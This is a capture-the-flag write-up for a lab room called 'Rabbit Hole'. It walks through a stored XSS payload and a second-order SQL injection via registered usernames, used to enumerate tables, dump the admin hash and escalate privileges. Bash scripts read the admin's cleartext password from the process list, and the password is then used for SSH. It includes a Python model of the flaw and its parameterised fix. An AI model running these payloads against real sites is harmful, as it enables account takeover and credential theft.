Rabbit Hole

Pasted image 20241116211332.png
It's easy to fall into rabbit holes.

Challenge Description

  • IP Address: 10.10.43.190

Reconnaissance

First, let's run an nmap scan against the target:

sudo nmap -sC -sV -vv -oA RabbitHole.nmap 10.10.43.190

Pasted image 20241116212448.png

The scan shows two open ports on the target:

  • Port 22
  • Port 80

Next, let's map the IP address to a hostname in /etc/hosts:

10.10.43.190 rabbithole.thm

Pasted image 20241116212748.png

Now let's open the web page. It asks us to register and then log in to the application via the links provided.

Pasted image 20241116212829.png

Register Page

The register page carries a note that anti-bruteforce measures are in place.

Pasted image 20241116215349.png

Register a user here, then follow the login link to the login page.

Login Page

The login page shows a slightly different note: there are anti-bruteforce measures in place, implemented with database queries. That wording is worth remembering, because it tells us our input reaches SQL somewhere in the login path.

Pasted image 20241116215640.png

Now log in to the application with the credentials you just registered.

Pasted image 20241117071617.png

XSS

After login our username is displayed on the page, which suggests the username field may be vulnerable to XSS. Let's register a user with the following payload as the username and log in with it:

<script>alert("Hacker is Here")</script>

Pasted image 20241117071925.png

Pasted image 20241117072242.png

Sure enough, after logging in the alert fires: the stored username is rendered into the page without output encoding, so this is a stored XSS.

Pasted image 20241117072124.png

The same username also produces a SQL error on the page. That tells us the stored username is reused in a database query without proper escaping, which is the entry point for the next step.

Pasted image 20241117072144.png

Second order SQL Injection

The injection is second order: the payload is stored in the username at registration and only executes later, when the application reads the stored username back and builds a query with it. Each test therefore takes two steps: register a user whose name is the payload, then log in as that user.

On the register page, create a username with the following payload to determine how many columns the vulnerable query returns (a UNION only succeeds when the column counts on both sides match):

/"UNION SELECT 1 -- -

Pasted image 20241117074357.png

Now log in with that same username. We get no result, so one column is wrong.

Pasted image 20241117074500.png

Let's try with two columns:

/"UNION SELECT 1,2 -- -

Pasted image 20241117074637.png

This time the query succeeds, so the vulnerable query returns two columns. Now let's enumerate the tables in the current database:

/" UNION SELECT 1, table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema=DATABASE() -- 

Pasted image 20241117080009.png

The result lists the tables in the current database (one row per column, since we queried INFORMATION_SCHEMA.COLUMNS); there are two of them, one of which is users.

Now, let's enumerate the users table to identify the column names.

/" UNION SELECT 1,SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'), 1, 16)-- -

SUBSTRING(..., 1, 16) fetches only the first 16 characters of the result; the rest is read by moving the offset forward 16 characters at a time.

Pasted image 20241117080828.png

Now, let's get the rest of the result:

/" UNION SELECT 1,SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema = database() and table_name ='users'), 17, 16)-- -

Pasted image 20241117081016.png

So the users table has the following columns:

id, username, password, group

Now let's list the usernames stored in the database:

/" UNION SELECT 1,`username` FROM users -- -

Pasted image 20241117081414.png

So the users table contains the following users:

admin
foo
bar
Hacker

Now let's dump the admin user's password hash, again in 16-character blocks:

Admin
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='admin'), 1, 16) -- -
/" UNION SELECT 1,SUBSTRING((SELECT group_concat(password) FROM users WHERE username='admin'), 17, 16) -- -

Pasted image 20241117081728.png

Pasted image 20241117081848.png
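To make the second-order mechanics concrete, here is an added, self-contained Python/SQLite model of the register-then-login flow above. It is not code from the room or from either write-up: the schema, the three rows and the 32-hex-character placeholder hash are constructed. register() stores the username with a parameterised INSERT, so nothing fires there; the page shown after login then pastes the stored username into a SQL string literal, which is where the payload runs. Because SQLite reads double-quoted strings as identifiers, the stand-in uses a single-quoted literal and the payload prefix is /' instead of the /" used against the room. It probes the column count the way the 1 / 1,2 attempts did, pages a result through the 16-character window exactly as the SUBSTRING offsets do, and shows the parameterised query that closes the hole.

```python
"""Second-order SQL injection, modelled on the register/login flow above.

Constructed stand-in for the room's PHP application (not its real code):
register() stores the username with a parameterised INSERT, so nothing
fires there; index_page_vulnerable() later reads the stored username back
and pastes it into a SQL string literal, which is where the payload runs.
"""
import sqlite3

CHUNK = 16  # only this many characters of the injected column come back per request


def build_db() -> sqlite3.Connection:
    """Constructed schema and rows; the 32-hex-character hash is a placeholder."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (
            id       INTEGER PRIMARY KEY,
            username TEXT NOT NULL,
            password TEXT NOT NULL,
            "group"  TEXT NOT NULL DEFAULT 'user'
        );
        INSERT INTO users (username, password, "group") VALUES
            ('admin', '0123456789abcdef0123456789abcdef', 'admin'),
            ('foo',   'x', 'user'),
            ('bar',   'y', 'user');
        """
    )
    return con


def register(con: sqlite3.Connection, username: str, password: str) -> None:
    """Registration is safe on its own: the payload is stored, not executed."""
    con.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))


def _stored_username(con: sqlite3.Connection, username: str) -> str:
    row = con.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        raise ValueError("unknown user")
    return row[0]


def index_page_vulnerable(con: sqlite3.Connection, username: str) -> list:
    """The page shown after login: the STORED username is concatenated into a
    single-quoted literal (SQLite treats double-quoted strings as identifiers,
    hence ' instead of the room's "). This is the second-order sink."""
    stored = _stored_username(con, username)
    return con.execute(f"SELECT id, username FROM users WHERE username = '{stored}'").fetchall()


def index_page_fixed(con: sqlite3.Connection, username: str) -> list:
    """Same page with the stored value bound as a parameter: the payload is inert."""
    stored = _stored_username(con, username)
    return con.execute("SELECT id, username FROM users WHERE username = ?", (stored,)).fetchall()


def probe_column_count(con: sqlite3.Connection, max_cols: int = 6):
    """UNION SELECT 1 / 1,2 / ... until the column counts match (the page's
    'no result' step): the first count that does not raise wins."""
    for n in range(1, max_cols + 1):
        payload = "/' UNION SELECT " + ", ".join(str(i) for i in range(1, n + 1)) + " -- -"
        register(con, payload, "asdf")
        try:
            index_page_vulnerable(con, payload)
            return n
        except sqlite3.OperationalError:  # column-count mismatch
            continue
    return None


def leak_in_chunks(con: sqlite3.Connection, subquery: str, max_chunks: int = 32) -> str:
    """Read a scalar subquery through the 16-character window, one throwaway
    user per block, stepping the offset 1, 17, 33, ... like the SUBSTRING payloads."""
    out = ""
    for k in range(max_chunks):
        off = 1 + k * CHUNK
        payload = f"/' UNION SELECT 1, SUBSTR(({subquery}), {off}, {CHUNK}) -- -"
        register(con, payload, "asdf")
        rows = index_page_vulnerable(con, payload)
        block = rows[-1][1] if rows else None  # the injected row is the last one
        if not block:
            break
        out += block
        if len(block) < CHUNK:  # short block means we reached the end
            break
    return out


def demo() -> dict:
    con = build_db()
    results = {
        "columns": probe_column_count(con),
        "user_columns": leak_in_chunks(con, "SELECT group_concat(name) FROM pragma_table_info('users')"),
        "admin_hash": leak_in_chunks(con, "SELECT password FROM users WHERE username = 'admin'"),
    }
    # The same stored payload against the parameterised page returns only its own row.
    results["fixed"] = index_page_fixed(con, "/' UNION SELECT 1, 2 -- -")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it prints the probed column count (2), the users columns read across two blocks, the placeholder hash reassembled from two 16-character blocks, and, for the parameterised page, just the payload user's own row. The fix is the last function: bind the stored value instead of interpolating it, no matter how "trusted" the column it came from seems.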

Hashcat in mode 0 (MD5, consistent with the 32 hex characters we read in two blocks) finds no match for this hash in rockyou.txt, so cracking is not the way in:

hashcat -m0 -a0 '<--HASH-->' ~/Pranava__Rao/Tools/Fuzzing\ List/rockyou.txt

Pasted image 20241117093941.png

Let's try to give our own Hacker user admin rights with a stacked query. Two details matter: group is a reserved word in MySQL, so the column name has to be quoted with backticks in the UPDATE, and a trailing comment is needed to swallow the closing quote of the original query. Whether the second statement executes at all depends on the application's database driver allowing multiple statements per call (PHP's mysqli_query does not; mysqli_multi_query does), so this may well fail silently.

/" UNION SELECT 1,2; UPDATE users SET `group` = 'admin' WHERE username = 'Hacker'; -- -

Pasted image 20241117094908.png

Pasted image 20241117102744.png

Looking at the page, the admin user logs in every minute. That points to a scheduled background process authenticating as admin, and its credentials might be observable on the database side while it runs.

(From this point on, this write-up draws on 0xb0b's write-up of this room, so all credit goes to that blog. Please read it for more information. Thank you :) )

Direct link: Rabbit Hole

The blog provides a few scripts that automate extracting the admin user's password from the database backend.
(For more information about the scripts, read the blog or watch this video: )

The idea is that the background job's login statement, with the admin password in clear text, is visible while it executes in the INFO column of information_schema.PROCESSLIST (which implies the web application's database user holds the PROCESS privilege; without it a user only sees its own threads). The payload reads INFO for the connection with the lowest ID, which the scripts assume is the background job's session. Because only 16 characters of the injected column come back per user, we register one user per block and step the SUBSTRING offset through 1, 17, 33, ... 209:

reg.sh

#!/bin/bash
# Register one throwaway user per 16-character block. Each username is a
# second-order payload that returns block N of the INFO column (the SQL
# statement currently executing) for the lowest-ID connection in
# information_schema.PROCESSLIST. Offsets 1,17,...,209 give 14 users.
#
# The browser headers from the captured request are dropped; in particular a
# hard-coded Content-Length would be wrong for the longer offsets, so curl is
# left to compute it.
TARGET='http://rabbithole.thm'
for off in $(seq 1 16 209); do
    curl -i -s -X POST \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        -b 'PHPSESSID=1' \
        --data-binary "username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), ${off}, 16) -- -&password=asdf&submit=Submit+Query" \
        "${TARGET}/register.php"
done

reg.sh

Now, run the reg.sh file

chmod +x reg.sh
./reg.sh

Pasted image 20241117113435.png

Next, each payload user has to log in, each under its own session cookie (PHPSESSID=1 to 14), so that the index page can later be fetched once per session. PHP accepts a client-supplied session ID by default (session.use_strict_mode is off), which is what lets us pick these fixed cookie values. The following script does it:

login.sh

#!/bin/bash
# Log each payload user in under its own session cookie (PHPSESSID=1..14),
# so that get.sh can later fetch the index page once per session. Same
# usernames and offsets as reg.sh; the form's submit field is "login" here.
TARGET='http://rabbithole.thm'
sess=1
for off in $(seq 1 16 209); do
    curl -i -s -X POST \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        -b "PHPSESSID=${sess}" \
        --data-binary "username=/\" UNION SELECT 1, SUBSTRING((SELECT INFO FROM information_schema.PROCESSLIST WHERE ID = (SELECT MIN(ID) FROM information_schema.PROCESSLIST)), ${off}, 16) -- -&password=asdf&login=Submit+Query" \
        "${TARGET}/login.php"
    sess=$((sess + 1))
done

login.sh

Pasted image 20241117113546.png

Once all users are logged in, we request the index page once per session. Loading it runs the stored username through the vulnerable query, and the injected 16-character block appears as the last table row, so we strip the HTML from that row. Note that INFO only holds a statement while it is executing (it is NULL for an idle connection), so a block is captured only if the background job's query is running at that moment; if a block comes back empty, request that session's page again.

curl -s http://rabbithole.thm -H 'Cookie: PHPSESSID=1' | grep -o '<tr><td>.*</td>' | tail -1 | sed -e 's/<[^>]*>//g'

To automate this, the following script requests the page for each session and concatenates the blocks:

get.sh

#!/bin/bash

# Initialize an empty variable to store concatenated output
result=""

# Loop through each session ID from 1 to 14
for i in {1..14}; do
  # Get the relevant data and strip HTML tags
  output=$(curl -s http://rabbithole.thm -H "Cookie: PHPSESSID=$i" | grep -o '<tr><td>.*</td>' | tail -1 | sed -e 's/<[^>]*>//g')
  
  result+="$output"
done

# Print the final concatenated result
echo "$result"

get.sh
chmod +x get.sh
./get.sh

The concatenated output is the background job's SQL statement, and it contains the admin user's password in clear text. The same password also works for SSH.

Pasted image 20241117114004.png

Now, using the same password, let's ssh into the system.

Pasted image 20241117114107.png

And here we are in: the admin user's password gets us an SSH session on the target.